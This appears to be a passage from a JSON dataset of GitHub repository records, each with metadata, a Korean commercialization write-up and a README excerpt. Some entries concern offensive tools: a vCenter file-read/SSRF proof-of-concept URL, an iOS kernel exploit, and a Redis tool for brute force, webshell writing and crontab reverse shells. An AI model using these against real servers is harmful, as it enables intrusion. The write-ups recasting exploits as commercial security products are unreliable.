[Analyzer](analyzer_link) that checks if struct fields can be re-arranged to optimize size.\n\n## Installation\n\nWith Go modules:\n\n```sh\ngo get github.com/orijtech/structslop/cmd/structslop\n```\n\nWithout Go modules:\n\n```sh\n$ cd $GOPATH/src/github.com/orijtech/structslop\n$ git checkout v0.0.6\n$ go get\n$ install ./cmd/structslop\n```\n\n## Usage\n\nYou can run `structslop` either on a Go package or Go files, the same way as\nother Go tools work.\n\nExample:\n\n```sh\n$ structslop github.com/orijtech/structslop/testdata/src/struct\n```\n\nor:\n\n```sh\n$ structslop ./testdata/src/struct/p.go\n```\n\nSample output:\n\n```text\n/go/src/github.com/orijtech/structslop/testdata/struct/p.go:30:9: struct has size 24 (size class 32), could be 16 (size class 16), you'll save 50.00% if you rearrange it to:\nstruct {\n\ty uint64\n\tx uint32\n\tz uint32\n}\n\n/go/src/github.com/orijtech/structslop/tes","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"PacktPublishing/Hands-On-Cryptography-with-Python","github_url":"https://github.com/PacktPublishing/Hands-On-Cryptography-with-Python","stars":8,"language":"Python","license":"MIT","abandonment_months":40,"description":"# Hands-On-Cryptography-with-Python 분석\n\n## 왜 보물인가\n데이터 보안을 배우고 싶은 초보자부터 전문가까지 암호화 기술을 직접 실습할 수 있는 완성된 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 교육 플랫폼**: 암호화 기초 온라인 강좌를 유료 구독 서비스로 운영하며, 실습 코드와 함께 단계별 영상 강의 제","readme_excerpt":"\n\n\n# Hands-On Cryptography with Python\n\n<a href=\"https://www.packtpub.com/networking-and-servers/hands-cryptography-python?utm_source=repository&utm_medium=github&utm_campaign=repository&utm_term=9781789534443\"><img src=\"https://d255esdrn735hr.cloudfront.net/sites/default/files/imagecache/ppv4_main_book_cover/B11735.png\" alt=\"Hands-On Cryptography with Python\" height=\"256px\" align=\"right\"></a>\n\nThis is the code repository for [Hands-On Cryptography with Python](https://www.packtpub.com/networking-and-servers/hands-cryptography-python), published by Packt.\n\n**Leverage the power of Python to encrypt and decrypt data**\n\n## What is this book about?\nCryptography is essential for protecting sensitive information, but it is often performed inadequately or incorrectly.\n\nThis book covers the following exciting features:\n* Protect data with encryption and hashing\n* Explore and compare various encryption methods\n* Encrypt data using the Caesar Cipher technique\n* Make hashes and crack them\n* Learn","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"l0ggg/VMware_vCenter","github_url":"https://github.com/l0ggg/VMware_vCenter","stars":13,"language":"","license":"unknown","abandonment_months":55,"description":"# VMware vCenter 저장소 분석\n\n## 왜 보물인가\n기업의 서버 관리 시스템을 자동화하는 도구로, 수천 개 서버를 한 번에 제어하려는 회사들에게 매우 필요한 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 IT 회사가 서버 관리 서비스를 클라우드로 제공하여 고객사들이 웹에서 직접 이용하도록 판매\n2. **내부 업무 도구","readme_excerpt":"# VMware vCenter earlier versions (7.0.2.00100) has unauthorized arbitrary file read + ssrf + xss vulnerability\n## POC\nhttps://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}\n\nFile read:\n\n![](./file_read.PNG)\n\n\nSSRF + XSS:\n\n![](./xss.PNG)\n\n## vulnerable code:\n/etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jar\n\ncom.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()\n\n![](./code.PNG)\n\nTested on vCenter 7.0.2.00100, not knowing the exact affected version range or cve id\n","composite_score":0.5013,"license_safety_tag":"unknown"},{"name":"Misterio77/flavours","github_url":"https://github.com/Misterio77/flavours","stars":5,"language":"Rust","license":"MIT","abandonment_months":36,"description":"# Misterio77/flavours 분석\n\n## 왜 보물인가\n사용자의 개인 취향에 맞게 소프트웨어 화면의 색상과 스타일을 자동으로 변경해주는 도구로, 사용자 경험을 향상시키는 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 애플리케이션에 \"다크모드/라이트모드 자동 전환\" 기능을 추가해 사용자 만족도 향상\n2. *","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/Misterio77/flavours/master/logo.svg\" alt=\"flavours logo\"/>\n</p>\n\n---\n\nA manager/builder for [Base16](https://github.com/chriskempson/base16). Written in Rust🦀.\n\n[![Crates.io](https://img.shields.io/crates/v/flavours.svg)](https://crates.io/crates/flavours)\n[![Build](https://github.com/misterio77/flavours/workflows/Rust/badge.svg)](https://github.com/misterio77/flavours/actions?query=workflow%3ARust)\n[![hydra status](https://hydra.m7.rs/shield/job/flavours/main/x86_64-linux.default)](https://hydra.m7.rs/jobset/flavours/main)\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/flavours.svg)](https://repology.org/project/flavours/versions)\n\nLooking for something similar to use with NixOS/home-manager? Check out [`nix-colors`](https://github.com/misterio77/nix-colors)\n\n## What\nThis is a CLI program that both builds and manages Base16 schemes and templates.\n\nThe Base16 specification consists of both schemes (wit","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"f/dahi","github_url":"https://github.com/f/dahi","stars":60,"language":"JavaScript","license":"MIT","abandonment_months":66,"description":"","readme_excerpt":"# 🧠 dahi.js\n\nDahi `de`/`-de` farkını ayıran NLP projesidir.\n\n**⚠️ Bu proje şaka amaçlıdır, kullanmayın** ⚠️\n\n## Yükleme\n\n```shell script\nnpm install dahijs\n# ya da\nyarn add dahijs\n```\n\n## Kullanım\n\n```js\nconst dahi = require('dahijs')\n\ndahi.fix('Bende sizinle geleceğim') # => 'Ben de sizinle geleceğim'\n```\n\n## Katkı ve Test\n\nProjeye katkı yaparken lütfen tüm testlerden geçtiğini test edin.\n\nTesti çalıştırmak için:\n\n```shell script\nnpm test\n```\n\nkomutunu çalşıtırın. Aşağıdaki şekilde çıktı alacaksınız.\n\n```shell script\n\"Bende geleceğim\" değerinin \"Ben de geleceğim\" olması bekleniyor.\n\"Bende seni seviyorum\" değerinin \"Ben de seni seviyorum\" olması bekleniyor.\n\"Sanada iyi geceler\" değerinin \"Sana da iyi geceler\" olması bekleniyor.\n\"Gelipte gitti\" değerinin \"Gelip de gitti\" olması bekleniyor.\n\"Raphael Benitez\" değerinin \"Raphael Benitez\" olması bekleniyor.\n\"Memnuniyetin bizide çok mutlu etti.\" değerinin \"Memnuniyetin bizi de çok mutlu etti.\" olması bekleniyor.\n\"Seninde yüreğin yansın\" değe","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"Singosgu/GreaterWMS","github_url":"https://github.com/Singosgu/GreaterWMS","stars":23,"language":"","license":"Apache-2.0","abandonment_months":40,"description":"# GreaterWMS 분석 보고서\n\n## 왜 보물인가\n창고 관리 업무를 자동화하는 오픈소스 솔루션으로, 비용 부담 없이 대규모 물류 시스템을 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n중소 쇼핑몰과 온라인 판매자들을 위한 월간 구독형 창고 관리 플랫폼으로 제공하여 매달 안정적인 수익 창출\n\n**2. 내부 업무 도구**\n","readme_excerpt":"<div align=\"center\">\n  <img src=\"static/img/logo.png\" alt=\"GreaterWMS logo\" width=\"200\" height=\"auto\" />\n  <h1>GreaterWMS</h1>\n  <p>Open Source Inventory Management System </p>\n\n<!-- Badges -->\n[![License: APLv2](https://img.shields.io/github/license/GreaterWMS/GreaterWMS)](https://opensource.org/licenses/Apache-2.0/)\n![Release Version (latest Version)](https://img.shields.io/github/v/release/GreaterWMS/GreaterWMS?color=orange&include_prereleases)\n![QR Code Support](https://img.shields.io/badge/QR--Code-Support-orange.svg)\n![Docker Support](https://img.shields.io/badge/Docker-Support-orange.svg)\n![i18n Support](https://img.shields.io/badge/i18n-Support-orange.svg)\n\n![repo size](https://img.shields.io/github/repo-size/GreaterWMS/GreaterWMS)\n![GitHub commit activity](https://img.shields.io/github/commit-activity/m/GreaterWMS/GreaterWMS)\n![Contributors](https://img.shields.io/github/contributors/GreaterWMS/GreaterWMS?color=blue)\n\n![GitHub Org's stars](https://img.shields.io/github/stars/G","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"dipanjal/DevOps","github_url":"https://github.com/dipanjal/DevOps","stars":17,"language":"Shell","license":"unknown","abandonment_months":51,"description":"# DevOps 저장소 평가\n\n## 왜 보물인가\n기업의 소프트웨어 배포와 운영을 자동화하는 실용적인 도구 모음으로, 시간과 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 애플리케이션 관리 플랫폼으로 개발사들에게 자동 배포 기능 제공\n2. **내부 업무 도구**: 대규모 IT팀이 서버 관리와 업데이","readme_excerpt":"﻿# DevOps Learning\n\n 1. [Demystify Container Networking](https://github.com/dipanjal/DevOps/tree/main/NetNS_Ingress_Egress_Traffic)\n\n\n","composite_score":0.5013,"license_safety_tag":"unknown"},{"name":"HaskellChamber/Haskell-University","github_url":"https://github.com/HaskellChamber/Haskell-University","stars":8,"language":"","license":"Apache-2.0","abandonment_months":102,"description":"# Haskell-University 상업화 분석\n\n## 왜 보물인가\n프로그래밍 언어를 배우려는 학생들을 위한 체계적인 교육 자료를 제공하여, 온라인 교육 시장의 수요를 충족할 수 있는 기초 자산입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 SaaS**: 구독 기반 프로그래밍 강좌 플랫폼으로 운영하여 월 사용료를 받는 방식\n2. **기업 내부 ","readme_excerpt":"![logo](hu-logo.jpg)\n# Haskell-University\n[![Join the chat at https://gitter.im/HaskellChamber/Haskell-University](https://badges.gitter.im/HaskellChamber/Haskell-University.svg)](https://gitter.im/HaskellChamber/Haskell-University?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nPortfolio-based approach to learning Haskell\n\n### About\n\nHaskell Universty is a community driven project, where one can learn Haskell by solving exercises. You will create programs that each week will gain on complexity.  Aim is to learn both the language as well as its real world application by exploring as many libraries, frameworks and tools as possible.\n\nHaskell University is designed to be self-paced, each exercise has a deadline estimated in weeks - you can start at anytime and just keep your private schedule. However because it hardly ever works :), starting on 26th November we initialized the first edition that will keep public schedule. If you will take that challenge, pleas","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"waterlink/Challenge-Build-Your-Own-Array-In-Js","github_url":"https://github.com/waterlink/Challenge-Build-Your-Own-Array-In-Js","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":65,"description":"# waterlink/Challenge-Build-Your-Own-Array-In-Js 분석\n\n## 왜 보물인가\n프로그래머들이 배열(데이터를 저장하는 기본 도구)을 처음부터 직접 만들면서 배우는 교육용 자료로, 개발자 양성 시장에서 꾸준한 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **코딩 교육 SaaS**: 초보 개발자 대상 온라인 강의 플랫폼에 ","readme_excerpt":"# Challenge “Build Your Own Array in Javascript!”\n\nRules are simple:\n\n- I give you a test suite for (almost) all the functionality of the array.\n- You implement that functionality in the class `MyArray`.\n- You can’t use standard javascript’s `Array`, instead you need to use the provided wrapper `PlainArray` that limits what you can do:\n\n```typescript\nclass PlainArray<T> {\n    constructor(capacity: number)\n    length: number\n    get(index: number): T\n    set(index: number, value: T)\n}\n```\n\n- `PlainArray` is a fixed-size array that has one property and two methods defined: `length, get(index) and set(index, value)`.\n- Even though the definition of that class is in Typescript, you will have to use vanilla ECMA Script 5.\n- Focus more on readability over the performance.\n\n## How to Run The Test Suite?\n\nFirst, you’ll need to clone this repository:\n\n```bash\n$ git clone https://github.com/waterlink/Challenge-Build-Your-Own-Array-In-Js\n$ cd Challenge-Build-Your-Own-Array-In-Js\n```\n\nYou will nee","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"ValveSoftware/ArtifactDeckCode","github_url":"https://github.com/ValveSoftware/ArtifactDeckCode","stars":8,"language":"PHP","license":"BSD-3-Clause","abandonment_months":91,"description":"# ValveSoftware/ArtifactDeckCode 분석\n\n## 왜 보물인가\n카드게임 '아티팩트'의 덱(카드 조합) 정보를 간단한 코드로 저장하고 공유할 수 있는 표준 방식으로, 게임 커뮤니티 활성화의 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n1. **덱 공유 커뮤니티 사이트**: 플레이어가 자신의 카드 조합을 간단한 코드로 다른 사람과 공유하","readme_excerpt":"ArtifactDeckCode\n---\n\nThis repository consists of 2 files that will assist in the encoding and decoding of deck \ncodes. These are source examples in PHP that can be used as is or as reference for porting \nto other languages.  This README also contains an explanation of the card set API and \ncorresponding json responses.\n\n### Contents\n\n* deck_encoder.php - the deck encoder used to convert deck info into a text code\n* deck_decoder.php - the deck decoder used to take a text code and return the deck info\n\n### About Deck Codes\n\nDeck Codes are URL friendly base64 encoded strings that allow communication of deck contents.\nThey will always begin with the characters ADC followed by the encoded string.\n\nThe Artifact Website supports viewing of decks via a URL of the form:\n\n```https://playartifact.com/d/<deck code >```\n\nWe encourage people to encode and generate a URL for sharing as this URL will show deck\npreviews on Twitter, Facebook, Steam and other applications which support Open Graph\nand oE","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"hugokernel/esphome-weather-station","github_url":"https://github.com/hugokernel/esphome-weather-station","stars":25,"language":"OpenSCAD","license":"MIT","abandonment_months":47,"description":"# esphome-weather-station 분석\n\n## 왜 보물인가\n누구나 날씨 측정기를 직접 만들 수 있는 오픈소스 설계도라서, 스마트홈 회사들이 제품 개발에 바로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 SaaS**: 가정용 날씨 모니터링 서비스로 월 구독료를 받으며 수백만 가구에 판매\n2. **농업 IoT 도구**: 농장의","readme_excerpt":"# ESPHome Weather Station\n\nRead this in other language: [French](README.fr.md)\n\n![Main photo of the weather station](images/station.jpg)\n\n## Introduction\n\nThe electronic part of this weather station is based on the model described in an article in Elektor magazine published in May 2020 entitled [Remake Elektor weather station](https://www.elektormagazine.com/labs/remake-elektor-weather-station) (an evolution of ESP32 Weather Station described in an article in the same magazine in January 2019).\n\nThe article details the creation of a weather station based on a set of sensors referenced WH-SP-WS02 ([Datasheet](docs/Weather_Sensor_Assembly_Updated.pdf)) whose original electronics are removed to be replaced by a sensor daughter board relaying the information to a motherboard built around an ESP32 (ESP32 Pico Kit).\n\nAn OpenSource firmware [GitHub - ElektorLabs/191148-RemakeWeatherStation: RemakeWeatherStation](https://github.com/ElektorLabs/191148-RemakeWeatherStation) is available to run t","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"terminal625/sucle","github_url":"https://github.com/terminal625/sucle","stars":9,"language":"Common Lisp","license":"MIT","abandonment_months":46,"description":"# terminal625/sucle 상용화 분석\n\n## 왜 보물인가\n이 프로젝트는 특정 문제를 효율적으로 해결하는 도구이지만, 현재 문서화와 설명이 부족하여 시장 잠재력을 제대로 평가하기 어렵습니다. 먼저 프로젝트의 핵심 기능이 무엇인지 명확히 파악해야 합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 구독 플랫폼으로 운영하여 월간 ","readme_excerpt":"","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"jsherman212/iomfb-exploit","github_url":"https://github.com/jsherman212/iomfb-exploit","stars":8,"language":"C","license":"MIT","abandonment_months":55,"description":"# iomfb-exploit 상용화 분석\n\n## 왜 보물인가\nApple 기기의 보안 취약점을 찾고 수정하려는 보안 전문가들이 필요로 하는 기술 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 점검 SaaS**: 기업들이 자신의 Apple 기기 보안 상태를 자동으로 검사하는 온라인 서비스\n2. **내부 IT 관리 도구**: 대기업의 정보보안팀이 직원 ","readme_excerpt":"Write up is here: https://jsherman212.github.io/2021/11/28/popping_ios14_with_iomfb.html\n\nExploit for CVE-2021-30807. If you really want to build a jailbreak out\nof it, it will require tuning for your device and iOS version because I\nhave no info leak to use for this.\n\nTo tune for A11 and below, use pongo to load xnuspy and build with\n`SAMPLING_MEMORY=1 make -B`. This will enable a test that gathers\nthe memory returned by `kernel_memory_allocate`, sorts those pointers,\nthen spits out a range. You'll see something like this:\n\n```\nsample_kernel_map: 0xffffffe8ebe9c000 [0x10000 bytes from behind]\nsample_kernel_map: to add to alloc_averager:\n[0xffffffe8ce934000, 0xffffffe8ebf98000],\n```\n\n(just ignore the warnings it spits out)\n\nThe test is meant to be ran 30 seconds after the device boots.\n\nInside `alloc_averager.py` is a couple of samples I already ran for\nmy phones. It takes the average of all the averages of each range.\nCreate a \"samples list\" for your device and add the range to it. \nR","composite_score":0.5013,"license_safety_tag":"safe"},{"name":"pan3a/Redis-Getshell","github_url":"https://github.com/pan3a/Redis-Getshell","stars":9,"language":"Python","license":"unknown","abandonment_months":63,"description":"# Redis-Getshell 상용화 분석\n\n## 왜 보물인가\nRedis 데이터베이스의 보안 취약점을 찾아내는 도구로, 기업의 데이터 유출 위험을 사전에 진단할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **보안 진단 SaaS**: 중소기업이 월 구독으로 자신의 데이터베이스 보안을 정기적으로 검사받는 서비스\n2. **기업 보안 컨설팅**: IT보안 회","readme_excerpt":"# Redis-Getshell\n- https://youtu.be/Qa4rE1Hr0vc\n- https://b23.tv/am71ti\n- <font color=red>其中的`p`参数为了区别端口`P`我将其改成了`a`</font>\n- Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell\n- Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379\n- 还可以更完善的,后面有时间了就修改哈!\n# Webshell\n![rediswebshell.png](https://i.loli.net/2020/10/30/HKJwpAaxfVtkgj4.png)\n![redis phpinfo.png](https://i.loli.net/2020/10/30/WVQBTNqxgM6E7LA.png)\n# SSH\n![redis ssh公钥.png](https://i.loli.net/2020/10/30/SiI9cmbUoWOMsA7.png)\n![ssh.png](https://i.loli.net/2020/10/30/J72PtpDSr8dN1ys.png)\n# crontab\n![redis定时计划.png](https://i.loli.net/2020/10/30/sdiFhNlD2rT4SyY.png)\n![定时计划.png](https://i.loli.net/2020/10/30/eGLidlZOvE5csxz.png)\n","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"DyncKathline/ZxingScan","github_url":"https://github.com/DyncKathline/ZxingScan","stars":5,"language":"Java","license":"AGPL-3.0","abandonment_months":53,"description":"# ZxingScan 저장소 분석\n\n## 왜 보물인가\n바코드와 QR코드를 인식하는 기술을 누구나 쉽게 사용할 수 있도록 만든 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **재고 관리 SaaS**: 소매점이나 창고에서 상품 바코드를 빠르게 스캔하여 재고를 자동으로 추적하는 웹 서비스\n2. **배송 추적 내부 도구**: 배송회사가 소포의 QR코드를 ","readme_excerpt":"# ZxingScan\nQRCode.java文件中提供了6种生成二维码的样式，可直接按照如下方式使用。\n```\nqrcode1.setImageBitmap(QRCode.createQRCode(\"http://www.tmtpost.com/2536837.html\"));\nqrcode2.setImageBitmap(QRCode.createQRCodeWithLogo2(\"http://www.jianshu.com/users/4a4eb4feee62/latest_articles\", 500, QRCode.drawableToBitmap(getResources().getDrawable(R.drawable.head))));\nqrcode3.setImageBitmap(QRCode.createQRCodeWithLogo3(\"http://www.jianshu.com/users/4a4eb4feee62/latest_articles\", 500, QRCode.drawableToBitmap(getResources().getDrawable(R.drawable.head))));\nqrcode4.setImageBitmap(QRCode.createQRCodeWithLogo4(\"http://www.jianshu.com/users/4a4eb4feee62/latest_articles\", 500, QRCode.drawableToBitmap(getResources().getDrawable(R.drawable.head))));\nqrcode5.setImageBitmap(QRCode.createQRCodeWithLogo5(\"http://www.jianshu.com/users/4a4eb4feee62/latest_articles\", 500, QRCode.drawableToBitmap(getResources().getDrawable(R.drawable.head))));\nqrcode6.setImageBitmap(QRCode.createQRCodeWithLogo6(\"http://www.jianshu.com/users/4a4eb4feee62/late","composite_score":0.5012,"license_safety_tag":"risky"},{"name":"isadorastan/estudos","github_url":"https://github.com/isadorastan/estudos","stars":14,"language":"","license":"unknown","abandonment_months":31,"description":"# isadorastan/estudos 상용화 분석\n\n## 왜 보물인가\n공개된 학습 자료와 코드 예제들이 모여 있어, 누구나 프로그래밍을 배우고 참고할 수 있는 무료 교육 자산이 됩니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 교육 플랫폼(SaaS)**\n- 초보자를 위한 프로그래밍 강좌 구성 시 이 자료들을 강의 교재로 패키징해 월 구독 서비스로 제공","readme_excerpt":"### Estudando teorias 🧠\n\nNeste repositório deixarei por escrito algumas questões teóricas que são chatas, porém necessárias para a evolução profissional 🤪\n\n### JS \n- [Como funciona o JS](#how-js-works)\n- [O que é o JS](#what-is-js)\n- [Operadores](#operators)\n- [Hoisting](#hosting)\n- [Scope](#scope)\n- [Nested Scopes](#nested-scopes)\n- [Variables](#variables)\n- [ES6 Features](#es6-features)\n- [Pure Functions](#pure-functions)\n- [Closure](#closure)\n- [Currying](#currying)\n- [Higher-Order Functions](#higher-order-functions)\n\n#### <a name=\"how-js-works\"></a> Como funciona o JS\nO google chrome usa a engine v8 (open source escrita em c++) . A engine v8 serve para interpretar um código javascript. \nA v8 foi projetada para aumentar a perfomance de execução do JS dentro de navegadores, ele compila código JS em código de maquina ao invés de usar um interpretador. Ele compila de js para código de máquina em tempo de execução, implementando um compilador JIT (just in time).\n\n```JS => c++ => Assembl","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"carltheperson/10-things-linux","github_url":"https://github.com/carltheperson/10-things-linux","stars":10,"language":"Go","license":"MIT","abandonment_months":65,"description":"# carltheperson/10-things-linux 분석\n\n## 왜 보물인가\n리눅스(컴퓨터 운영체제)를 처음 배우는 사람들을 위해 핵심 개념 10가지를 쉽게 설명한 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 리눅스 입문 강좌의 무료 학습 자료로 제공하여 사용자 유입 증대\n2. **기업 교육 도구**: IT 부서 신입","readme_excerpt":"# 10 things Linux\n\nHow do you advance your Linux skills when you are already comfortable with the basics? My solution was to come up with 10 subjects to learn and create an accompanying mini-project.\n\nYou can read the blog post [here](https://carltheperson.com/posts/10-things-linux)\n\nYou can also find binaries under *Releases*\n\n# License\n\nThis project is licensed under the MIT License - see the [LICENSE](./LICENSE) file for details","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"gakonst/loot-unchained","github_url":"https://github.com/gakonst/loot-unchained","stars":9,"language":"Solidity","license":"GPL-3.0","abandonment_months":56,"description":"# Loot-Unchained 분석 보고서\n\n## 왜 보물인가\n게임 내 아이템 거래를 자동으로 분석하고 최적 가격을 찾아주는 도구로, 게임 경제 생태계에서 누구나 공정한 거래를 할 수 있게 만듭니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 마켓플레이스 SaaS**\n- 게임사가 자체 아이템 거래소에 탑재하여 플레이어에게 실시간 가격 추천 제공\n\n**2. ","readme_excerpt":"# <h1 align=\"center\"> LootLoose </h1>\n\n**Open your Loot bags and see what's inside**\n\n![Github Actions](https://github.com/gakonst/lootloose/workflows/Tests/badge.svg)\n\nLootLoose is an ERC-1155 contract which allows you to:\n1. Open your [Loot bags](https://www.lootrng.com/) and mint 8 ERC-1155 tokens, corresponding to each item\nin the bag\n2. Re-assemble your ERC721 bag by giving back the ERC-1155 tokens to the contract\n\nEach ERC1155's token URI is a b64 encoded SVG image, with the item's name (just that item's, not\nany other item from the bag that contained it).\n\nYou can mint the 8 ERC-1155 tokens via 2 ways:\n1. `approve` the `LootLoose.sol` contract to spend your NFT (or via `setApprovalForAll`) and calling `open`.\n2. Transferring your NFT directly to the contract, triggerring the `onERC721Received` callback\n\nYou can reassemble the bag by first `approve` or `setApprovalForAll` for the tokens\ncontained in the bag and then calling `reassemble`.\n\nAverage gas cost to `open` is 322k gas, t","composite_score":0.5012,"license_safety_tag":"restricted"},{"name":"swiftui-library/hstack-snap-to-scroll","github_url":"https://github.com/swiftui-library/hstack-snap-to-scroll","stars":12,"language":"Swift","license":"unknown","abandonment_months":26,"description":"# swiftui-library/hstack-snap-to-scroll 분석\n\n## 왜 보물인가\n아이폰 앱에서 화면을 손가락으로 스르륵 넘길 때 딱 맞게 멈추는 부드러운 스크롤 기능을 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 SaaS**: 상품 카탈로그 앱에서 이미지를 부드럽게 넘기는 기능 제공\n2. **뉴스 및 콘텐츠","readme_excerpt":"# SnapToScroll\n\nDrop-in SwiftUI-based container view for horizontal snapping. \n\nTo see the rest of the SwiftUI Library, visit [our website](https://swiftuilibrary.com). \n\nhttps://user-images.githubusercontent.com/8763719/131696736-0474ae54-35ad-4579-ab1e-366ae101949b.mp4\n\n## Getting Started\n\nUsing `SnapToScroll` is straightforward. There's just three steps.\n\n1. Import `SnapToScroll`\n2. Replace `HStack` with `HStackSnap`\n3. Add `.snapAlignmentHelper` to your view.\n\nAn example:\n\n```swift\nimport SnapToScroll                               // Step 1\n...\n\nHStackSnap(alignment: .center(32)) {              // Step 2\n\n    ForEach(myModels) { viewModel in\n\n        MyView(\n            selectedIndex: $selectedIndex,\n            viewModel: viewModel\n         )\n         .snapAlignmentHelper(id: viewModel.id)   // Step 3\n     }\n}                  \n```\nFor more examples, see `SnapToScrollDemo/ContentView.swift`.\n\n## Configuration\n\n`HStackSnap` comes with two customizable properties:\n\n- `alignment`: Th","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"MobileNativeFoundation/discussions","github_url":"https://github.com/MobileNativeFoundation/discussions","stars":5,"language":"","license":"CC-BY-4.0","abandonment_months":64,"description":"# MobileNativeFoundation/discussions 분석\n\n## 왜 보물인가\n모바일 앱 개발자들이 실제 업무에서 마주치는 문제들을 공개적으로 논의하고 해결하는 커뮤니티 허브입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 개발자 커뮤니티 SaaS**: 기술 질문 답변과 베스트 프랙티스 공유 플랫폼으로 운영\n2. **앱 개발사 내부 도구**:","readme_excerpt":"This repository hosts the [Mobile Native Foundation's\ndiscussions](https://github.com/MobileNativeFoundation/discussions/discussions).\n\nThese discussions can cover anything related to projects, technologies,\nand processes related to shipping large-scale mobile apps.\n","composite_score":0.5012,"license_safety_tag":"unknown"},{"name":"uber-research/metropolis-hastings-gans","github_url":"https://github.com/uber-research/metropolis-hastings-gans","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":32,"description":"# Metropolis-Hastings GANs 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터 패턴을 학습하여 새로운 데이터를 만들어내는 AI 기술로, 의료 영상 생성, 게임 콘텐츠 제작, 부족한 데이터 보충 등 다양한 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n**1. 의료 영상 생성 SaaS**: 병원과 진단센터에 희귀질환 학습용 의료 ","readme_excerpt":"# Metropolis-Hastings GANs\n\nThis repository contains the source code supporting the paper [Metropolis-Hastings Generative Adversarial Networks](https://arxiv.org/abs/1811.11357):\n\n```\n@inproceedings{Turner2019,\n    author={Ryan Turner and Jane Hung and Eric Frank and Yunus Saatci and Jason Yosinski},\n    title={Metropolis-Hastings Generative Adversarial Networks},\n    booktitle={Proceedings of the 36th International Conference on Machine Learning},\n    pages={6345--6353},\n    year={2019}\n}\n```\n\nFor more on this project, see the [Uber AI Labs Blog post](https://eng.uber.com/mh-gan/).\n\n## Getting Started\n\nThese instructions will get you a copy of the project up and running on your local machine.\n\n### Prerequisites\n\nThis code has been tested on `Python 2.7.9` and the exact version of the dependencies are pinned in `requirements.pip`. It has been tested on Mac and Ubuntu.\n\n### Installing\n\nFirst clone the repo:\n```\ngit clone git@github.com:uber-research/metropolis-hastings-gans.git\n```\nInsi","composite_score":0.5012,"license_safety_tag":"safe"},{"name":"ThatOneCalculator/Among-Us-Dumpy-Gif-Maker","github_url":"https://github.com/ThatOneCalculator/Among-Us-Dumpy-Gif-Maker","stars":12,"language":"Python","license":"NOASSERTION","abandonment_months":50,"description":"# Among-Us-Dumpy-Gif-Maker 상용화 분석\n\n## 왜 보물인가\n인기 게임 캐릭터를 활용해 재미있는 움직이는 이미지를 자동으로 만들어주는 도구로, SNS 콘텐츠 창작자들이 쉽게 바이럴 콘텐츠를 제작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 (웹 기반 GIF 생성 플랫폼)**\n- 사용자가 웹사이트에 접속해 드래그-","readme_excerpt":"<p align=\"center\">\n   <!--<br>\n   <a href=\"https://app.revolt.chat/bot/01FQ1AMSEKYQM3Z7ZNJZVQ3DNA\" target=\"blank\"><img src=\"https://shields.io/badge/invite_the-revolt_bot-FC4454?logo=rakuten&style=for-the-badge\" height=\"35\"/></a>-->\n   <br>\n   <a href=\"https://dumpy.t1c.dev\"><img align=\"center\" src=\"https://user-images.githubusercontent.com/44733677/147306225-acb0d9e9-8f4d-4f68-8f4a-eb2258556f07.png\" width=\"500\"/></a><br>\n   <br>\n   <a href=\"https://discord.com/api/oauth2/authorize?client_id=847164104161361921&permissions=117760&scope=bot%20applications.commands\" target=\"blank\"><img src=\"https://shields.io/badge/invite_the-discord_bot-5865F2?logo=discord&style=for-the-badge&logoColor=ffffff\" height=\"50\"/></a>\n   <br>\n   <a href=\"https://top.gg/bot/847164104161361921/\">\n      <img src=\"https://top.gg/api/widget/status/847164104161361921.svg\" alt=\"Among Us Dumpy Bot\" />\n   </a> <a href=\"https://top.gg/bot/847164104161361921/\">\n      <img 